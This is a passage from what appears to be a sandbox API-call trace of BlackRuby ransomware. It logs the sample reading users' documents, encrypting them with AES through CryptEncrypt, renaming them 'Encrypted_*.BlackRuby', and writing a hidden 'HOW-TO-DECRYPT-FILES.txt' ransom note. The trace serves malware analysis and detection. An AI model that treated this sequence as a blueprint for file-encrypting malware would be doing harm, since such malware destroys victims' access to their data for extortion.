J3R7gDP4Tj\\TAwlSBLOoj7r\\MZBR1DCvwCm\\ebeKetTvZtWAx_\\Encrypted_ItHVvy4MukrLIW3t0kxKxeCBonLX1czsJVSXakKfFjj5Y.BlackRuby", nBufferLength=0x105, lpBuffer=0x18e738, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\TAwlSBLOoj7r\\MZBR1DCvwCm\\ebeKetTvZtWAx_\\Encrypted_ItHVvy4MukrLIW3t0kxKxeCBonLX1czsJVSXakKfFjj5Y.BlackRuby", lpFilePart=0x0) returned 0xa2 [0059.148] GetLastError () returned 0xb7 [0059.148] SetErrorMode (uMode=0x1) returned 0x0 [0059.148] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\TAwlSBLOoj7r\\MZBR1DCvwCm\\ebeKetTvZtWAx_\\cLp6-Cw-_VYvtP.odt" (normalized: "c:\\users\\eebsym5\\documents\\ip8 evongvjza\\dp6a j3r7gdp4tj\\tawlsblooj7r\\mzbr1dcvwcm\\ebekettvztwax_\\clp6-cw-_vyvtp.odt"), fInfoLevelId=0x0, lpFileInformation=0x18ebb8 | out: lpFileInformation=0x18ebb8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbc63e7b0, ftCreationTime.dwHighDateTime=0x1d358e7, ftLastAccessTime.dwLowDateTime=0x9cee8420, ftLastAccessTime.dwHighDateTime=0x1d3546a, ftLastWriteTime.dwLowDateTime=0x2b732e00, ftLastWriteTime.dwHighDateTime=0x1d39df7, nFileSizeHigh=0x0, nFileSizeLow=0xaf40)) returned 1 [0059.148] GetLastError () returned 0xb7 [0059.148] SetErrorMode (uMode=0x0) returned 0x1 [0059.148] MoveFileW (lpExistingFileName="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\TAwlSBLOoj7r\\MZBR1DCvwCm\\ebeKetTvZtWAx_\\cLp6-Cw-_VYvtP.odt" (normalized: "c:\\users\\eebsym5\\documents\\ip8 evongvjza\\dp6a j3r7gdp4tj\\tawlsblooj7r\\mzbr1dcvwcm\\ebekettvztwax_\\clp6-cw-_vyvtp.odt"), lpNewFileName="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\TAwlSBLOoj7r\\MZBR1DCvwCm\\ebeKetTvZtWAx_\\Encrypted_ItHVvy4MukrLIW3t0kxKxeCBonLX1czsJVSXakKfFjj5Y.BlackRuby" (normalized: "c:\\users\\eebsym5\\documents\\ip8 evongvjza\\dp6a j3r7gdp4tj\\tawlsblooj7r\\mzbr1dcvwcm\\ebekettvztwax_\\encrypted_ithvvy4mukrliw3t0kxkxecbonlx1czsjvsxakkffjj5y.blackruby")) returned 1 [0059.150] GetLastError () returned 0xb7 [0059.151] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\TAwlSBLOoj7r\\MZBR1DCvwCm\\ebeKetTvZtWAx_\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e61c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\TAwlSBLOoj7r\\MZBR1DCvwCm\\ebeKetTvZtWAx_\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x79 [0059.151] GetLastError () returned 0xb7 [0059.151] SetErrorMode (uMode=0x1) returned 0x0 [0059.151] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\TAwlSBLOoj7r\\MZBR1DCvwCm\\ebeKetTvZtWAx_\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\users\\eebsym5\\documents\\ip8 evongvjza\\dp6a j3r7gdp4tj\\tawlsblooj7r\\mzbr1dcvwcm\\ebekettvztwax_\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0059.151] GetLastError () returned 0x0 [0059.151] GetFileType (hFile=0x184) returned 0x1 [0059.151] SetErrorMode (uMode=0x0) returned 0x1 [0059.151] GetFileType (hFile=0x184) returned 0x1 [0059.152] CloseHandle (hObject=0x184) returned 1 [0059.152] GetLastError () returned 0x0 [0059.152] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\TAwlSBLOoj7r\\MZBR1DCvwCm\\ebeKetTvZtWAx_\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e744, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\TAwlSBLOoj7r\\MZBR1DCvwCm\\ebeKetTvZtWAx_\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x79 [0059.152] GetLastError () returned 0x0 [0059.152] SetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\TAwlSBLOoj7r\\MZBR1DCvwCm\\ebeKetTvZtWAx_\\HOW-TO-DECRYPT-FILES.txt", dwFileAttributes=0x1) returned 1 [0059.152] GetLastError () returned 0x0 [0059.152] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\TAwlSBLOoj7r\\MZBR1DCvwCm\\ebeKetTvZtWAx_\\kSZBvk.ppt", nBufferLength=0x105, lpBuffer=0x18e770, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\TAwlSBLOoj7r\\MZBR1DCvwCm\\ebeKetTvZtWAx_\\kSZBvk.ppt", lpFilePart=0x0) returned 0x6b [0059.152] GetLastError () returned 0x0 [0059.152] SetErrorMode (uMode=0x1) returned 0x0 [0059.152] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\TAwlSBLOoj7r\\MZBR1DCvwCm\\ebeKetTvZtWAx_\\kSZBvk.ppt" (normalized: "c:\\users\\eebsym5\\documents\\ip8 evongvjza\\dp6a j3r7gdp4tj\\tawlsblooj7r\\mzbr1dcvwcm\\ebekettvztwax_\\kszbvk.ppt"), fInfoLevelId=0x0, lpFileInformation=0x1c824c4 | out: lpFileInformation=0x1c824c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x492b4380, ftCreationTime.dwHighDateTime=0x1d35408, ftLastAccessTime.dwLowDateTime=0xe04f9990, ftLastAccessTime.dwHighDateTime=0x1d35a21, ftLastWriteTime.dwLowDateTime=0xe04f9990, ftLastWriteTime.dwHighDateTime=0x1d35a21, nFileSizeHigh=0x0, nFileSizeLow=0x11c2)) returned 1 [0059.152] GetLastError () returned 0x0 [0059.153] SetErrorMode (uMode=0x0) returned 0x1 [0059.153] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\TAwlSBLOoj7r\\MZBR1DCvwCm\\ebeKetTvZtWAx_\\kSZBvk.ppt", nBufferLength=0x105, lpBuffer=0x18e738, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\TAwlSBLOoj7r\\MZBR1DCvwCm\\ebeKetTvZtWAx_\\kSZBvk.ppt", lpFilePart=0x0) returned 0x6b [0059.153] GetLastError () returned 0x0 [0059.153] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\TAwlSBLOoj7r\\MZBR1DCvwCm\\ebeKetTvZtWAx_\\kSZBvk.ppt", nBufferLength=0x105, lpBuffer=0x18e60c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\TAwlSBLOoj7r\\MZBR1DCvwCm\\ebeKetTvZtWAx_\\kSZBvk.ppt", lpFilePart=0x0) returned 0x6b [0059.153] GetLastError () returned 0x0 [0059.153] SetErrorMode (uMode=0x1) returned 0x0 [0059.153] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\TAwlSBLOoj7r\\MZBR1DCvwCm\\ebeKetTvZtWAx_\\kSZBvk.ppt" (normalized: "c:\\users\\eebsym5\\documents\\ip8 evongvjza\\dp6a j3r7gdp4tj\\tawlsblooj7r\\mzbr1dcvwcm\\ebekettvztwax_\\kszbvk.ppt"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0059.153] GetLastError () returned 0x0 [0059.153] GetFileType (hFile=0x184) returned 0x1 [0059.153] SetErrorMode (uMode=0x0) returned 0x1 [0059.153] GetFileType (hFile=0x184) returned 0x1 [0059.153] GetFileSize (in: hFile=0x184, lpFileSizeHigh=0x18ebc0 | out: lpFileSizeHigh=0x18ebc0*=0x0) returned 0x11c2 [0059.153] GetLastError () returned 0x0 [0059.153] ReadFile (in: hFile=0x184, lpBuffer=0x1c84284, nNumberOfBytesToRead=0x11c2, lpNumberOfBytesRead=0x18eb68, lpOverlapped=0x0 | out: lpBuffer=0x1c84284*, lpNumberOfBytesRead=0x18eb68*=0x11c2, lpOverlapped=0x0) returned 1 [0059.154] GetLastError () returned 0x0 [0059.154] CloseHandle (hObject=0x184) returned 1 [0059.154] GetLastError () returned 0x0 [0059.154] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\TAwlSBLOoj7r\\MZBR1DCvwCm\\ebeKetTvZtWAx_\\kSZBvk.ppt", nBufferLength=0x105, lpBuffer=0x18e71c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\TAwlSBLOoj7r\\MZBR1DCvwCm\\ebeKetTvZtWAx_\\kSZBvk.ppt", lpFilePart=0x0) returned 0x6b [0059.154] GetLastError () returned 0x0 [0059.154] SetErrorMode (uMode=0x1) returned 0x0 [0059.154] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\TAwlSBLOoj7r\\MZBR1DCvwCm\\ebeKetTvZtWAx_\\kSZBvk.ppt" (normalized: "c:\\users\\eebsym5\\documents\\ip8 evongvjza\\dp6a j3r7gdp4tj\\tawlsblooj7r\\mzbr1dcvwcm\\ebekettvztwax_\\kszbvk.ppt"), fInfoLevelId=0x0, lpFileInformation=0x18ebd0 | out: lpFileInformation=0x18ebd0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x492b4380, ftCreationTime.dwHighDateTime=0x1d35408, ftLastAccessTime.dwLowDateTime=0xe04f9990, ftLastAccessTime.dwHighDateTime=0x1d35a21, ftLastWriteTime.dwLowDateTime=0xe04f9990, ftLastWriteTime.dwHighDateTime=0x1d35a21, nFileSizeHigh=0x0, nFileSizeLow=0x11c2)) returned 1 [0059.154] GetLastError () returned 0x0 [0059.154] SetErrorMode (uMode=0x0) returned 0x1 [0059.165] CryptImportKey (in: hProv=0x37c680, pbData=0x1ce0a28, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x18eb0c | out: phKey=0x18eb0c*=0x360f60) returned 1 [0059.165] GetLastError () returned 0x0 [0059.165] CryptContextAddRef (hProv=0x37c680, pdwReserved=0x0, dwFlags=0x0) returned 1 [0059.165] GetLastError () returned 0x0 [0059.170] CryptContextAddRef (hProv=0x37c680, pdwReserved=0x0, dwFlags=0x0) returned 1 [0059.170] GetLastError () returned 0x0 [0059.170] CryptDuplicateKey (in: hKey=0x360f60, pdwReserved=0x0, dwFlags=0x0, phKey=0x18eac8 | out: phKey=0x18eac8*=0x360c20) returned 1 [0059.170] CryptContextAddRef (hProv=0x37c680, pdwReserved=0x0, dwFlags=0x0) returned 1 [0059.170] GetLastError () returned 0x0 [0059.170] CryptSetKeyParam (hKey=0x360c20, dwParam=0x4, pbData=0x1d0da74*=0x1, dwFlags=0x0) returned 1 [0059.170] GetLastError () returned 0x0 [0059.170] CryptSetKeyParam (hKey=0x360c20, dwParam=0x1, pbData=0x1d0da40, dwFlags=0x0) returned 1 [0059.170] GetLastError () returned 0x0 [0059.170] CryptEncrypt (in: hKey=0x360c20, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d0dabc*, pdwDataLen=0x18eb58*=0x12c0, dwBufLen=0x12c0 | out: pbData=0x1d0dabc*, pdwDataLen=0x18eb58*=0x12c0) returned 1 [0059.170] GetLastError () returned 0x0 [0059.170] CryptEncrypt (in: hKey=0x360c20, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d10068*, pdwDataLen=0x18eb70*=0x10, dwBufLen=0x10 | out: pbData=0x1d10068*, pdwDataLen=0x18eb70*=0x10) returned 1 [0059.171] GetLastError () returned 0x0 [0059.171] CryptEncrypt (in: hKey=0x360c20, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d10098*, pdwDataLen=0x18eb78*=0x0, dwBufLen=0x10 | out: pbData=0x1d10098*, pdwDataLen=0x18eb78*=0x10) returned 1 [0059.171] GetLastError () returned 0x0 [0059.171] CryptDestroyKey (hKey=0x360f60) returned 1 [0059.171] CryptReleaseContext (hProv=0x37c680, dwFlags=0x0) returned 1 [0059.171] CryptReleaseContext (hProv=0x37c680, dwFlags=0x0) returned 1 [0059.171] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\TAwlSBLOoj7r\\MZBR1DCvwCm\\ebeKetTvZtWAx_\\kSZBvk.ppt", nBufferLength=0x105, lpBuffer=0x18e614, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\TAwlSBLOoj7r\\MZBR1DCvwCm\\ebeKetTvZtWAx_\\kSZBvk.ppt", lpFilePart=0x0) returned 0x6b [0059.171] GetLastError () returned 0x0 [0059.171] SetErrorMode (uMode=0x1) returned 0x0 [0059.172] GetFileType (hFile=0x184) returned 0x1 [0059.172] GetFileType (hFile=0x184) returned 0x1 [0059.173] MoveFileW (lpExistingFileName="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\TAwlSBLOoj7r\\MZBR1DCvwCm\\ebeKetTvZtWAx_\\kSZBvk.ppt" (normalized: "c:\\users\\eebsym5\\documents\\ip8 evongvjza\\dp6a j3r7gdp4tj\\tawlsblooj7r\\mzbr1dcvwcm\\ebekettvztwax_\\kszbvk.ppt"), lpNewFileName="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\TAwlSBLOoj7r\\MZBR1DCvwCm\\ebeKetTvZtWAx_\\Encrypted_6jJj13dBFNYfkQOeI20ZUbcn3DSWryMlVuVTcn1k.BlackRuby" (normalized: "c:\\users\\eebsym5\\documents\\ip8 evongvjza\\dp6a j3r7gdp4tj\\tawlsblooj7r\\mzbr1dcvwcm\\ebekettvztwax_\\encrypted_6jjj13dbfnyfkqoei20zubcn3dswrymlvuvtcn1k.blackruby")) returned 1 [0059.173] GetLastError () returned 0xb7 [0059.174] GetFileType (hFile=0x184) returned 0x1 [0059.174] SetErrorMode (uMode=0x0) returned 0x1 [0059.174] GetFileType (hFile=0x184) returned 0x1 [0059.174] GetFileSize (in: hFile=0x184, lpFileSizeHigh=0x18ebc0 | out: lpFileSizeHigh=0x18ebc0*=0x0) returned 0x15324 [0059.174] GetLastError () returned 0x0 [0059.193] ReadFile (in: hFile=0x184, lpBuffer=0x2ae8450, nNumberOfBytesToRead=0x15324, lpNumberOfBytesRead=0x18eb68, lpOverlapped=0x0 | out: lpBuffer=0x2ae8450*, lpNumberOfBytesRead=0x18eb68*=0x15324, lpOverlapped=0x0) returned 1 [0059.194] GetLastError () returned 0x0 [0059.194] CloseHandle (hObject=0x184) returned 1 [0059.194] GetLastError () returned 0x0 [0059.195] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\TAwlSBLOoj7r\\MZBR1DCvwCm\\ebeKetTvZtWAx_\\NJjb_Ni68jjtkbW.csv", nBufferLength=0x105, lpBuffer=0x18e71c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\TAwlSBLOoj7r\\MZBR1DCvwCm\\ebeKetTvZtWAx_\\NJjb_Ni68jjtkbW.csv", lpFilePart=0x0) returned 0x74 [0059.195] GetLastError () returned 0x0 [0059.195] SetErrorMode (uMode=0x1) returned 0x0 [0059.195] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\TAwlSBLOoj7r\\MZBR1DCvwCm\\ebeKetTvZtWAx_\\NJjb_Ni68jjtkbW.csv" (normalized: "c:\\users\\eebsym5\\documents\\ip8 evongvjza\\dp6a j3r7gdp4tj\\tawlsblooj7r\\mzbr1dcvwcm\\ebekettvztwax_\\njjb_ni68jjtkbw.csv"), fInfoLevelId=0x0, lpFileInformation=0x18ebd0 | out: lpFileInformation=0x18ebd0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x47875c40, ftCreationTime.dwHighDateTime=0x1d35952, ftLastAccessTime.dwLowDateTime=0x274ce2a0, ftLastAccessTime.dwHighDateTime=0x1d34bcf, ftLastWriteTime.dwLowDateTime=0x274ce2a0, ftLastWriteTime.dwHighDateTime=0x1d34bcf, nFileSizeHigh=0x0, nFileSizeLow=0x15324)) returned 1 [0059.195] GetLastError () returned 0x0 [0059.195] SetErrorMode (uMode=0x0) returned 0x1 [0059.195] CryptAcquireContextW (in: phProv=0x18eb30, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18eb30*=0x37c680) returned 1 [0059.195] GetLastError () returned 0x0 [0059.231] CryptImportKey (in: hProv=0x37c680, pbData=0x1b7d80c, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x18eb0c | out: phKey=0x18eb0c*=0x360da0) returned 1 [0059.231] GetLastError () returned 0x0 [0059.231] CryptContextAddRef (hProv=0x37c680, pdwReserved=0x0, dwFlags=0x0) returned 1 [0059.231] GetLastError () returned 0x0 [0059.236] CryptContextAddRef (hProv=0x37c680, pdwReserved=0x0, dwFlags=0x0) returned 1 [0059.236] GetLastError () returned 0x0 [0059.236] CryptDuplicateKey (in: hKey=0x360da0, pdwReserved=0x0, dwFlags=0x0, phKey=0x18eac8 | out: phKey=0x18eac8*=0x360e20) returned 1 [0059.236] CryptContextAddRef (hProv=0x37c680, pdwReserved=0x0, dwFlags=0x0) returned 1 [0059.237] GetLastError () returned 0x0 [0059.237] CryptSetKeyParam (hKey=0x360e20, dwParam=0x4, pbData=0x1baa858*=0x1, dwFlags=0x0) returned 1 [0059.237] GetLastError () returned 0x0 [0059.237] CryptSetKeyParam (hKey=0x360e20, dwParam=0x1, pbData=0x1baa824, dwFlags=0x0) returned 1 [0059.237] GetLastError () returned 0x0 [0059.237] CryptEncrypt (in: hKey=0x360e20, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2b12bd0*, pdwDataLen=0x18eb58*=0x15420, dwBufLen=0x15420 | out: pbData=0x2b12bd0*, pdwDataLen=0x18eb58*=0x15420) returned 1 [0059.238] GetLastError () returned 0x0 [0059.238] CryptEncrypt (in: hKey=0x360e20, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1baa8b4*, pdwDataLen=0x18eb70*=0x10, dwBufLen=0x10 | out: pbData=0x1baa8b4*, pdwDataLen=0x18eb70*=0x10) returned 1 [0059.238] GetLastError () returned 0x0 [0059.238] CryptEncrypt (in: hKey=0x360e20, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1baa8e4*, pdwDataLen=0x18eb78*=0x0, dwBufLen=0x10 | out: pbData=0x1baa8e4*, pdwDataLen=0x18eb78*=0x10) returned 1 [0059.238] GetLastError () returned 0x0 [0059.239] CryptDestroyKey (hKey=0x360da0) returned 1 [0059.239] CryptReleaseContext (hProv=0x37c680, dwFlags=0x0) returned 1 [0059.239] CryptReleaseContext (hProv=0x37c680, dwFlags=0x0) returned 1 [0059.239] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\TAwlSBLOoj7r\\MZBR1DCvwCm\\ebeKetTvZtWAx_\\NJjb_Ni68jjtkbW.csv", nBufferLength=0x105, lpBuffer=0x18e614, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\TAwlSBLOoj7r\\MZBR1DCvwCm\\ebeKetTvZtWAx_\\NJjb_Ni68jjtkbW.csv", lpFilePart=0x0) returned 0x74 [0059.239] GetLastError () returned 0x0 [0059.239] SetErrorMode (uMode=0x1) returned 0x0 [0059.239] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\TAwlSBLOoj7r\\MZBR1DCvwCm\\ebeKetTvZtWAx_\\NJjb_Ni68jjtkbW.csv" (normalized: "c:\\users\\eebsym5\\documents\\ip8 evongvjza\\dp6a j3r7gdp4tj\\tawlsblooj7r\\mzbr1dcvwcm\\ebekettvztwax_\\njjb_ni68jjtkbw.csv"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0059.241] GetLastError () returned 0xb7 [0059.241] GetFileType (hFile=0x184) returned 0x1 [0059.241] SetErrorMode (uMode=0x0) returned 0x1 [0059.241] GetFileType (hFile=0x184) returned 0x1 [0059.242] CloseHandle (hObject=0x184) returned 1 [0059.243] GetLastError () returned 0xb7 [0059.243] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\TAwlSBLOoj7r\\MZBR1DCvwCm\\ebeKetTvZtWAx_\\NJjb_Ni68jjtkbW.csv", nBufferLength=0x105, lpBuffer=0x18e738, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\TAwlSBLOoj7r\\MZBR1DCvwCm\\ebeKetTvZtWAx_\\NJjb_Ni68jjtkbW.csv", lpFilePart=0x0) returned 0x74 [0059.243] GetLastError () returned 0xb7 [0059.243] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\TAwlSBLOoj7r\\MZBR1DCvwCm\\ebeKetTvZtWAx_\\Encrypted_BPvj6vC2gDlys8kfVr0h6qRpyrf6pPXEHjq0k7cYuM.BlackRuby", nBufferLength=0x105, lpBuffer=0x18e738, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\TAwlSBLOoj7r\\MZBR1DCvwCm\\ebeKetTvZtWAx_\\Encrypted_BPvj6vC2gDlys8kfVr0h6qRpyrf6pPXEHjq0k7cYuM.BlackRuby", lpFilePart=0x0) returned 0x9f [0059.243] GetLastError () returned 0xb7 [0059.243] SetErrorMode (uMode=0x1) returned 0x0 [0059.243] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\TAwlSBLOoj7r\\MZBR1DCvwCm\\ebeKetTvZtWAx_\\NJjb_Ni68jjtkbW.csv" (normalized: "c:\\users\\eebsym5\\documents\\ip8 evongvjza\\dp6a j3r7gdp4tj\\tawlsblooj7r\\mzbr1dcvwcm\\ebekettvztwax_\\njjb_ni68jjtkbw.csv"), fInfoLevelId=0x0, lpFileInformation=0x18ebb8 | out: lpFileInformation=0x18ebb8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x47875c40, ftCreationTime.dwHighDateTime=0x1d35952, ftLastAccessTime.dwLowDateTime=0x274ce2a0, ftLastAccessTime.dwHighDateTime=0x1d34bcf, ftLastWriteTime.dwLowDateTime=0x2b817640, ftLastWriteTime.dwHighDateTime=0x1d39df7, nFileSizeHigh=0x0, nFileSizeLow=0x15430)) returned 1 [0059.243] GetLastError () returned 0xb7 [0059.243] SetErrorMode (uMode=0x0) returned 0x1 [0059.243] MoveFileW (lpExistingFileName="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\TAwlSBLOoj7r\\MZBR1DCvwCm\\ebeKetTvZtWAx_\\NJjb_Ni68jjtkbW.csv" (normalized: "c:\\users\\eebsym5\\documents\\ip8 evongvjza\\dp6a j3r7gdp4tj\\tawlsblooj7r\\mzbr1dcvwcm\\ebekettvztwax_\\njjb_ni68jjtkbw.csv"), lpNewFileName="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\TAwlSBLOoj7r\\MZBR1DCvwCm\\ebeKetTvZtWAx_\\Encrypted_BPvj6vC2gDlys8kfVr0h6qRpyrf6pPXEHjq0k7cYuM.BlackRuby" (normalized: "c:\\users\\eebsym5\\documents\\ip8 evongvjza\\dp6a j3r7gdp4tj\\tawlsblooj7r\\mzbr1dcvwcm\\ebekettvztwax_\\encrypted_bpvj6vc2gdlys8kfvr0h6qrpyrf6ppxehjq0k7cyum.blackruby")) returned 1 [0059.243] GetLastError () returned 0xb7 [0059.243] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\TAwlSBLOoj7r\\MZBR1DCvwCm\\ebeKetTvZtWAx_\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e61c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\TAwlSBLOoj7r\\MZBR1DCvwCm\\ebeKetTvZtWAx_\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x79 [0059.244] GetLastError () returned 0xb7 [0059.244] SetErrorMode (uMode=0x1) returned 0x0 [0059.244] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\TAwlSBLOoj7r\\MZBR1DCvwCm\\ebeKetTvZtWAx_\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\users\\eebsym5\\documents\\ip8 evongvjza\\dp6a j3r7gdp4tj\\tawlsblooj7r\\mzbr1dcvwcm\\ebekettvztwax_\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0059.244] GetLastError () returned 0x5 [0059.244] SetErrorMode (uMode=0x0) returned 0x1 [0059.245] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\TAwlSBLOoj7r\\MZBR1DCvwCm\\ebeKetTvZtWAx_\\t_92bBPTvh4ViPSD7x.odp", nBufferLength=0x105, lpBuffer=0x18e770, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\TAwlSBLOoj7r\\MZBR1DCvwCm\\ebeKetTvZtWAx_\\t_92bBPTvh4ViPSD7x.odp", lpFilePart=0x0) returned 0x77 [0059.245] GetLastError () returned 0x5 [0059.245] SetErrorMode (uMode=0x1) returned 0x0 [0059.245] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\TAwlSBLOoj7r\\MZBR1DCvwCm\\ebeKetTvZtWAx_\\t_92bBPTvh4ViPSD7x.odp" (normalized: "c:\\users\\eebsym5\\documents\\ip8 evongvjza\\dp6a j3r7gdp4tj\\tawlsblooj7r\\mzbr1dcvwcm\\ebekettvztwax_\\t_92bbptvh4vipsd7x.odp"), fInfoLevelId=0x0, lpFileInformation=0x1bc8120 | out: lpFileInformation=0x1bc8120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x33d13d50, 